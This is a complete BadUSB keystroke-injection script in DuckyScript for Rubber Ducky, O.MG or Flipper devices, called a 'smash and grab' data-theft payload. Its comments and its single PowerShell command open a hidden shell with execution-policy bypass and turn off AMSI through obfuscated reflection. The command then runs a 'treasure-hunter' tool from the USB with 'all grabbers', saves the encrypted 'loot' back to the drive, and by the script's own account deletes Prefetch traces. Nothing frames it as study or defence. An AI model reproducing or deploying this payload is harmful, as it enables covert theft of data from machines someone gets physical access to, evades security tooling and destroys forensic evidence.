REM ============================================================
REM TREASURE-HUNTER: Smash and Grab (USB)
REM ============================================================
REM Plug in. Walk away. Pull out when LED stops / USB ejects.
REM
REM What happens:
REM   1. Opens hidden PowerShell
REM   2. Bypasses AMSI
REM   3. Finds treasure-hunter.exe on USB
REM   4. Runs smash scan (5 min) with all grabbers
REM   5. Encrypts output to USB as loot.jsonl.enc
REM   6. Cleans up Prefetch + PyInstaller traces
REM   7. Ejects USB
REM
REM Prerequisites: treasure-hunter.exe on USB root
REM Device: Hak5 Rubber Ducky / O.MG / Flipper BadUSB
REM ============================================================

DELAY 2000
GUI r
DELAY 500
STRING powershell -w hidden -ep bypass -nop -c "$a=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUtils');$f=$a.GetField('am'+'siInitFailed','NonPublic,Static');$f.SetValue($null,$true);$d=(Get-Volume|?{Test-Path \"$($_.DriveLetter):\treasure-hunter.exe\"}).DriveLetter;if($d){& \"$d`:\treasure-hunter.exe\" --auto --passphrase 'CHANGE-ME'}"
ENTER
